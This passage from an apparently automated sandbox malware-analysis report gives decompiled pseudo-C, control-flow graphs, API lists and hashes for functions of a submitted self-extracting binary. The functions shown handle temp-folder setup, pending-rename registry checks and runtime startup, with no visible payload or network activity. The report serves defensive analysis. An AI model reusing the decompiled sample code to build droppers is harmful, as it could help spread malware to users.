                                                                                                                                                                                                      • Part of subcall function 003953A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0039542B
                                                                                                                                                                                                      • Part of subcall function 003953A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00395434
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                    • API String ID: 1979080616-3963195772
                                                                                                                                                                                                    • Opcode ID: 2b1eddb391d077abdb85b278ffe81ee04b1bcc51e65d36bbd9294483e39ef198
                                                                                                                                                                                                    • Instruction ID: fd7eb9e67cef2fdfd9e1acac68ff09824a8d7bcff3b55e23e495a280d8bed9ab
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b1eddb391d077abdb85b278ffe81ee04b1bcc51e65d36bbd9294483e39ef198
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27312971B00A055BCF139F399C4567E77AEAB87340F06012BE907D6651DB71CE818795
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 563 39256d-39257d 564 392583-392589 563->564 565 392622-392627 call 3924e0 563->565 566 3925e8-392607 RegOpenKeyExA 564->566 567 39258b 564->567 569 392629-39262f 565->569 571 392609-392620 RegQueryInfoKeyA 566->571 572 3925e3-3925e6 566->572 567->569 570 392591-392595 567->570 570->569 574 39259b-3925ba RegOpenKeyExA 570->574 575 3925d1-3925dd RegCloseKey 571->575 572->569 574->572 576 3925bc-3925cb RegQueryValueExA 574->576 575->572 576->575
                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                    			E0039256D(signed int __ecx) {
                                                                                                                                                                                                    				int _v8;
                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                    				signed int _t13;
                                                                                                                                                                                                    				signed int _t19;
                                                                                                                                                                                                    				long _t24;
                                                                                                                                                                                                    				void* _t26;
                                                                                                                                                                                                    				int _t31;
                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                    				_t31 = 0;
                                                                                                                                                                                                    				if(_t13 == 0) {
                                                                                                                                                                                                    					_t31 = E003924E0(_t26);
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t34 = _t13 - 1;
                                                                                                                                                                                                    					if(_t34 == 0) {
                                                                                                                                                                                                    						_v8 = 0;
                                                                                                                                                                                                    						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                    							goto L7;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                    							goto L6;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						L12:
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                    							_v8 = 0;
                                                                                                                                                                                                    							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                    							if(_t24 == 0) {
                                                                                                                                                                                                    								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                    								L6:
                                                                                                                                                                                                    								asm("sbb eax, eax");
                                                                                                                                                                                                    								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                    								RegCloseKey(_v12); // executed
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							L7:
                                                                                                                                                                                                    							_t31 = _v8;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t31;
                                                                                                                                                                                                    				goto L12;
                                                                                                                                                                                                    			}











                                                                                                                                                                                                    0x00392572
                                                                                                                                                                                                    0x00392573
                                                                                                                                                                                                    0x00392575
                                                                                                                                                                                                    0x00392578
                                                                                                                                                                                                    0x0039257d
                                                                                                                                                                                                    0x00392627
                                                                                                                                                                                                    0x00392583
                                                                                                                                                                                                    0x00392586
                                                                                                                                                                                                    0x00392589
                                                                                                                                                                                                    0x003925eb
                                                                                                                                                                                                    0x00392607
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00392609
                                                                                                                                                                                                    0x0039261a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039261a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039258b
                                                                                                                                                                                                    0x0039258b
                                                                                                                                                                                                    0x0039259e
                                                                                                                                                                                                    0x003925b2
                                                                                                                                                                                                    0x003925ba
                                                                                                                                                                                                    0x003925cb
                                                                                                                                                                                                    0x003925d1
                                                                                                                                                                                                    0x003925d6
                                                                                                                                                                                                    0x003925da
                                                                                                                                                                                                    0x003925dd
                                                                                                                                                                                                    0x003925dd
                                                                                                                                                                                                    0x003925e3
                                                                                                                                                                                                    0x003925e3
                                                                                                                                                                                                    0x003925e3
                                                                                                                                                                                                    0x0039258b
                                                                                                                                                                                                    0x00392589
                                                                                                                                                                                                    0x0039262f
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00394096,00394096,?,00391ED3,00000001,00000000,?,?,00394137,?), ref: 003925B2
                                                                                                                                                                                                    • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00394096,?,00391ED3,00000001,00000000,?,?,00394137,?,00394096), ref: 003925CB
                                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,00391ED3,00000001,00000000,?,?,00394137,?,00394096), ref: 003925DD
                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00394096,00394096,?,00391ED3,00000001,00000000,?,?,00394137,?), ref: 003925FF
                                                                                                                                                                                                    • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00394096,00000000,00000000,00000000,00000000,?,00391ED3,00000001,00000000), ref: 0039261A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • PendingFileRenameOperations, xrefs: 003925C3
                                                                                                                                                                                                    • System\CurrentControlSet\Control\Session Manager, xrefs: 003925A8
                                                                                                                                                                                                    • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 003925F5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                    • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                    • API String ID: 2209512893-559176071
                                                                                                                                                                                                    • Opcode ID: e6c78a7d4c6b722f1a69048ef6d3691a8614b9737eb6a5d6692e452d4a4ac7a3
                                                                                                                                                                                                    • Instruction ID: e2421709464938cde812c1c8c006d39fe8786d637ec7b2bd68c6d6c19bb7c900
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6c78a7d4c6b722f1a69048ef6d3691a8614b9737eb6a5d6692e452d4a4ac7a3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1119E35902638BB9F229B929C0ADFFBF7CEF427A1F114156F808E2100DA714E44E6E1
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 577 396a60-396a91 call 397155 call 397208 GetStartupInfoW 583 396a93-396aa2 577->583 584 396abc-396abe 583->584 585 396aa4-396aa6 583->585 588 396abf-396ac5 584->588 586 396aa8-396aad 585->586 587 396aaf-396aba Sleep 585->587 586->588 587->583 589 396ad1-396ad7 588->589 590 396ac7-396acf _amsg_exit 588->590 592 396ad9-396ae9 call 396c3f 589->592 593 396b05 589->593 591 396b0b-396b11 590->591 595 396b2e-396b30 591->595 596 396b13-396b24 _initterm 591->596 599 396aee-396af2 592->599 593->591 597 396b3b-396b42 595->597 598 396b32-396b39 595->598 596->595 600 396b44-396b51 call 397060 597->600 601 396b67-396b71 597->601 598->597 599->591 602 396af4-396b00 599->602 600->601 611 396b53-396b65 600->611 604 396b74-396b79 601->604 605 396c39-396c3e call 39724d 602->605 608 396b7b-396b7d 604->608 609 396bc5-396bc8 604->609 614 396b7f-396b81 608->614 615 396b94-396b98 608->615 612 396bca-396bd3 609->612 613 396bd6-396be3 _ismbblead 609->613 611->601 612->613 618 396be9-396bed 613->618 619 396be5-396be6 613->619 614->609 620 396b83-396b85 614->620 616 396b9a-396b9e 615->616 617 396ba0-396ba2 615->617 621 396ba3-396bbc call 392bfb 616->621 617->621 618->604 623 396c1e-396c25 618->623 619->618 620->615 624 396b87-396b8a 620->624 621->623 630 396bbe-396bbf exit 621->630 626 396c32 623->626 627 396c27-396c2d _cexit 623->627 624->615 628 396b8c-396b92 624->628 626->605 627->626 628->620 630->609
                                                                                                                                                                                                    C-Code - Quality: 51%
                                                                                                                                                                                                    			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                    				signed int* _t25;
                                                                                                                                                                                                    				signed int _t26;
                                                                                                                                                                                                    				signed int _t29;
                                                                                                                                                                                                    				int _t30;
                                                                                                                                                                                                    				signed int _t37;
                                                                                                                                                                                                    				signed char _t41;
                                                                                                                                                                                                    				signed int _t53;
                                                                                                                                                                                                    				signed int _t54;
                                                                                                                                                                                                    				intOrPtr _t56;
                                                                                                                                                                                                    				signed int _t58;
                                                                                                                                                                                                    				signed int _t59;
                                                                                                                                                                                                    				intOrPtr* _t60;
                                                                                                                                                                                                    				void* _t62;
                                                                                                                                                                                                    				void* _t67;
                                                                                                                                                                                                    				void* _t68;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				E00397155();
                                                                                                                                                                                                    				_push(0x58);
                                                                                                                                                                                                    				_push(0x3972b8);
                                                                                                                                                                                                    				E00397208(__ebx, __edi, __esi);
                                                                                                                                                                                                    				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                    				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                    				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                    				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                    				_t53 = 0;
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                    					if(0 == 0) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(0 != _t56) {
                                                                                                                                                                                                    						Sleep(0x3e8);
                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t58 = 1;
                                                                                                                                                                                                    						_t53 = 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                    					_t67 =  *0x3988b0 - _t58; // 0x2
                                                                                                                                                                                                    					if(_t67 != 0) {
                                                                                                                                                                                                    						__eflags =  *0x3988b0; // 0x2
                                                                                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                                                                                    							 *0x3981e4 = _t58;
                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							 *0x3988b0 = _t58;
                                                                                                                                                                                                    							_t37 = E00396C3F(0x3910b8, 0x3910c4); // executed
                                                                                                                                                                                                    							__eflags = _t37;
                                                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                                                    								goto L13;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                    								_t30 = 0xff;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_push(0x1f);
                                                                                                                                                                                                    						L00396FF4();
                                                                                                                                                                                                    						L13:
                                                                                                                                                                                                    						_t68 =  *0x3988b0 - _t58; // 0x2
                                                                                                                                                                                                    						if(_t68 == 0) {
                                                                                                                                                                                                    							_push(0x3910b4);
                                                                                                                                                                                                    							_push(0x3910ac);
                                                                                                                                                                                                    							L00397202();
                                                                                                                                                                                                    							 *0x3988b0 = 2;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						if(_t53 == 0) {
                                                                                                                                                                                                    							 *0x3988ac = 0;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t71 =  *0x3988b4;
                                                                                                                                                                                                    						if( *0x3988b4 != 0 && E00397060(_t71, 0x3988b4) != 0) {
                                                                                                                                                                                                    							_t60 =  *0x3988b4; // 0x0
                                                                                                                                                                                                    							 *0x39a288(0, 2, 0);
                                                                                                                                                                                                    							 *_t60();
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t25 = __imp___acmdln; // 0x74895b9c
                                                                                                                                                                                                    						_t59 =  *_t25;
                                                                                                                                                                                                    						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                    						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                    							_t41 =  *_t59;
                                                                                                                                                                                                    							if(_t41 > 0x20) {
                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							if(_t41 != 0) {
                                                                                                                                                                                                    								if(_t54 != 0) {
                                                                                                                                                                                                    									goto L32;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                    										_t59 = _t59 + 1;
                                                                                                                                                                                                    										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                    										_t41 =  *_t59;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                    							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                    								_t29 = 0xa;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_push(_t29);
                                                                                                                                                                                                    							_t30 = E00392BFB(0x390000, 0, _t59); // executed
                                                                                                                                                                                                    							 *0x3981e0 = _t30;
                                                                                                                                                                                                    							__eflags =  *0x3981f8;
                                                                                                                                                                                                    							if( *0x3981f8 == 0) {
                                                                                                                                                                                                    								exit(_t30); // executed
                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags =  *0x3981e4;
                                                                                                                                                                                                    							if( *0x3981e4 == 0) {
                                                                                                                                                                                                    								__imp___cexit();
                                                                                                                                                                                                    								_t30 =  *0x3981e0; // 0x80070002
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                    							goto L40;
                                                                                                                                                                                                    							L32:
                                                                                                                                                                                                    							__eflags = _t41 - 0x22;
                                                                                                                                                                                                    							if(_t41 == 0x22) {
                                                                                                                                                                                                    								__eflags = _t54;
                                                                                                                                                                                                    								_t15 = _t54 == 0;
                                                                                                                                                                                                    								__eflags = _t15;
                                                                                                                                                                                                    								_t54 = 0 | _t15;
                                                                                                                                                                                                    								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                    							__imp___ismbblead(_t26);
                                                                                                                                                                                                    							__eflags = _t26;
                                                                                                                                                                                                    							if(_t26 != 0) {
                                                                                                                                                                                                    								_t59 = _t59 + 1;
                                                                                                                                                                                                    								__eflags = _t59;
                                                                                                                                                                                                    								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t59 = _t59 + 1;
                                                                                                                                                                                                    							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L40:
                                                                                                                                                                                                    					return E0039724D(_t30);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t58 = 1;
                                                                                                                                                                                                    				__eflags = 1;
                                                                                                                                                                                                    				goto L7;
                                                                                                                                                                                                    			}


















                                                                                                                                                                                                    0x00396a60
                                                                                                                                                                                                    0x00396a6a
                                                                                                                                                                                                    0x00396a6c
                                                                                                                                                                                                    0x00396a71
                                                                                                                                                                                                    0x00396a78
                                                                                                                                                                                                    0x00396a7f
                                                                                                                                                                                                    0x00396a85
                                                                                                                                                                                                    0x00396a8e
                                                                                                                                                                                                    0x00396a91
                                                                                                                                                                                                    0x00396a93
                                                                                                                                                                                                    0x00396a9c
                                                                                                                                                                                                    0x00396aa2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00396aa6
                                                                                                                                                                                                    0x00396ab4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00396aa8
                                                                                                                                                                                                    0x00396aaa
                                                                                                                                                                                                    0x00396aab
                                                                                                                                                                                                    0x00396aab
                                                                                                                                                                                                    0x00396abf
                                                                                                                                                                                                    0x00396abf
                                                                                                                                                                                                    0x00396ac5
                                                                                                                                                                                                    0x00396ad1
                                                                                                                                                                                                    0x00396ad7
                                                                                                                                                                                                    0x00396b05
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00396ad9
                                                                                                                                                                                                    0x00396ad9
                                                                                                                                                                                                    0x00396ae9
                                                                                                                                                                                                    0x00396af0
                                                                                                                                                                                                    0x00396af2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00396af4
                                                                                                                                                                                                    0x00396af4
                                                                                                                                                                                                    0x00396afb
                                                                                                                                                                                                    0x00396afb
                                                                                                                                                                                                    0x00396af2
                                                                                                                                                                                                    0x00396ac7
                                                                                                                                                                                                    0x00396ac7
                                                                                                                                                                                                    0x00396ac9
                                                                                                                                                                                                    0x00396b0b
                                                                                                                                                                                                    0x00396b0b
                                                                                                                                                                                                    0x00396b11
                                                                                                                                                                                                    0x00396b13
                                                                                                                                                                                                    0x00396b18
                                                                                                                                                                                                    0x00396b1d
                                                                                                                                                                                                    0x00396b24
                                                                                                                                                                                                    0x00396b24
                                                                                                                                                                                                    0x00396b30
                                                                                                                                                                                                    0x00396b39
                                                                                                                                                                                                    0x00396b39
                                                                                                                                                                                                    0x00396b3b
                                                                                                                                                                                                    0x00396b42
                                                                                                                                                                                                    0x00396b57
                                                                                                                                                                                                    0x00396b5f
                                                                                                                                                                                                    0x00396b65
                                                                                                                                                                                                    0x00396b65
                                                                                                                                                                                                    0x00396b67
                                                                                                                                                                                                    0x00396b6c
                                                                                                                                                                                                    0x00396b6e
                                                                                                                                                                                                    0x00396b71
                                                                                                                                                                                                    0x00396b74
                                                                                                                                                                                                    0x00396b74
                                                                                                                                                                                                    0x00396b79
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00396b7d
                                                                                                                                                                                                    0x00396b81
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00396b83
                                                                                                                                                                                                    0x00396b8c
                                                                                                                                                                                                    0x00396b8d
                                                                                                                                                                                                    0x00396b90
                                                                                                                                                                                                    0x00396b90
                                                                                                                                                                                                    0x00396b83
                                                                                                                                                                                                    0x00396b81
                                                                                                                                                                                                    0x00396b94
                                                                                                                                                                                                    0x00396b98
                                                                                                                                                                                                    0x00396ba2
                                                                                                                                                                                                    0x00396b9a
                                                                                                                                                                                                    0x00396b9a
                                                                                                                                                                                                    0x00396b9a
                                                                                                                                                                                                    0x00396ba3
                                                                                                                                                                                                    0x00396bab
                                                                                                                                                                                                    0x00396bb0
                                                                                                                                                                                                    0x00396bb5
                                                                                                                                                                                                    0x00396bbc
                                                                                                                                                                                                    0x00396bbf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00396bbf
                                                                                                                                                                                                    0x00396c1e
                                                                                                                                                                                                    0x00396c25
                                                                                                                                                                                                    0x00396c27
                                                                                                                                                                                                    0x00396c2d
                                                                                                                                                                                                    0x00396c2d
                                                                                                                                                                                                    0x00396c32
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00396bc5
                                                                                                                                                                                                    0x00396bc5
                                                                                                                                                                                                    0x00396bc8
                                                                                                                                                                                                    0x00396bcc
                                                                                                                                                                                                    0x00396bce
                                                                                                                                                                                                    0x00396bce
                                                                                                                                                                                                    0x00396bd1
                                                                                                                                                                                                    0x00396bd3
                                                                                                                                                                                                    0x00396bd3
                                                                                                                                                                                                    0x00396bd6
                                                                                                                                                                                                    0x00396bda
                                                                                                                                                                                                    0x00396be1
                                                                                                                                                                                                    0x00396be3
                                                                                                                                                                                                    0x00396be5
                                                                                                                                                                                                    0x00396be5
                                                                                                                                                                                                    0x00396be6
                                                                                                                                                                                                    0x00396be6
                                                                                                                                                                                                    0x00396be9
                                                                                                                                                                                                    0x00396bea
                                                                                                                                                                                                    0x00396bea
                                                                                                                                                                                                    0x00396b74
                                                                                                                                                                                                    0x00396c39
                                                                                                                                                                                                    0x00396c3e
                                                                                                                                                                                                    0x00396c3e
                                                                                                                                                                                                    0x00396abe
                                                                                                                                                                                                    0x00396abe
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00397155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00397182
                                                                                                                                                                                                      • Part of subcall function 00397155: GetCurrentProcessId.KERNEL32 ref: 00397191
                                                                                                                                                                                                      • Part of subcall function 00397155: GetCurrentThreadId.KERNEL32 ref: 0039719A
                                                                                                                                                                                                      • Part of subcall function 00397155: GetTickCount.KERNEL32 ref: 003971A3
                                                                                                                                                                                                      • Part of subcall function 00397155: QueryPerformanceCounter.KERNEL32(?), ref: 003971B8
                                                                                                                                                                                                    • GetStartupInfoW.KERNEL32(?,003972B8,00000058), ref: 00396A7F
                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 00396AB4
                                                                                                                                                                                                    • _amsg_exit.MSVCRT ref: 00396AC9
                                                                                                                                                                                                    • _initterm.MSVCRT ref: 00396B1D
                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00396B49
                                                                                                                                                                                                    • exit.KERNELBASE ref: 00396BBF
                                                                                                                                                                                                    • _ismbblead.MSVCRT ref: 00396BDA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 836923961-0
                                                                                                                                                                                                    • Opcode ID: e65c90278889d0412e58e0b7d84861e07c0ee47a8a556e74717f599a54721fa2
                                                                                                                                                                                                    • Instruction ID: bc0e2a70351e400f3dfaffad00ffbc016313bc007f6e5860e26b0adf5b8d306b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e65c90278889d0412e58e0b7d84861e07c0ee47a8a556e74717f599a54721fa2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E141027195A7268BDF23AB6ADC067AA77E8EB85720F11011BE841E7290DB754C408B90
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 631 3958c8-3958d5 632 3958d8-3958dd 631->632 632->632 633 3958df-3958f1 LocalAlloc 632->633 634 395919-395959 call 391680 call 39658a CreateFileA LocalFree 633->634 635 3958f3-395901 call 3944b9 633->635 639 395906-395910 call 396285 634->639 645 39595b-39596c CloseHandle GetFileAttributesA 634->645 635->639 644 395912-395918 639->644 645->639 646 39596e-395970 645->646 646->639 647 395972-39597b 646->647 647->644
                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                    			E003958C8(intOrPtr* __ecx) {
                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                    				intOrPtr _t6;
                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                    				void* _t14;
                                                                                                                                                                                                    				signed char _t16;
                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                    				intOrPtr* _t27;
                                                                                                                                                                                                    				CHAR* _t33;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				_t33 = __ecx;
                                                                                                                                                                                                    				_t27 = __ecx;
                                                                                                                                                                                                    				_t23 = __ecx + 1;
                                                                                                                                                                                                    				do {
                                                                                                                                                                                                    					_t6 =  *_t27;
                                                                                                                                                                                                    					_t27 = _t27 + 1;
                                                                                                                                                                                                    				} while (_t6 != 0);
                                                                                                                                                                                                    				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                    				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                    				if(_t20 != 0) {
                                                                                                                                                                                                    					E00391680(_t20, _t36, _t33);
                                                                                                                                                                                                    					E0039658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                    					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                    					_v8 = _t10;
                                                                                                                                                                                                    					LocalFree(_t20);
                                                                                                                                                                                                    					_t12 = _v8;
                                                                                                                                                                                                    					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                    						goto L4;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						CloseHandle(_t12);
                                                                                                                                                                                                    						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                    						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                    							goto L4;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							 *0x399124 = 0;
                                                                                                                                                                                                    							_t14 = 1;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
